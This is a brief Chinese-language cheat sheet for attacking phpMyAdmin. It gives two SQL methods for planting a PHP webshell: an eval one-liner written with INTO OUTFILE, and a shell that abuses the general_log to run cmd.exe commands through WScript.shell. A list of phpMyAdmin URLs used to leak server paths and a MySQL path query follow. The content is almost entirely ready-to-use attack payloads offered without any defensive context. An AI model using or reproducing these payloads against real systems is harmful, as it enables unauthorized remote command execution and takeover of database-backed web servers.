phpmyadmin写一句话

方法一

1	select '<?php @eval($_POST[cmd])?>' into outfile ''

方法二

1
2
3

set global general_log='on';
set global general_log_file='';
select '<?php $command=$_REQUEST[abc]; $wsh= new COM("WScript.shell"); $exec= $wsh->exec("cmd.exe /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput ?>';

phpmyadmin爆路经

1. /phpmyadmin/libraries/lect_lang.lib.php
2. /phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4. load_file()
5. /phpmyadmin/themes/darkblue_orange/layout.inc.php
6. /phpmyadmin/libraries/select_lang.lib.php
7. /phpmyadmin/libraries/lect_lang.lib.php
8. /phpmyadmin/libraries/mcrypt.lib.php

mysql安装路径

1	show variables like "%char%";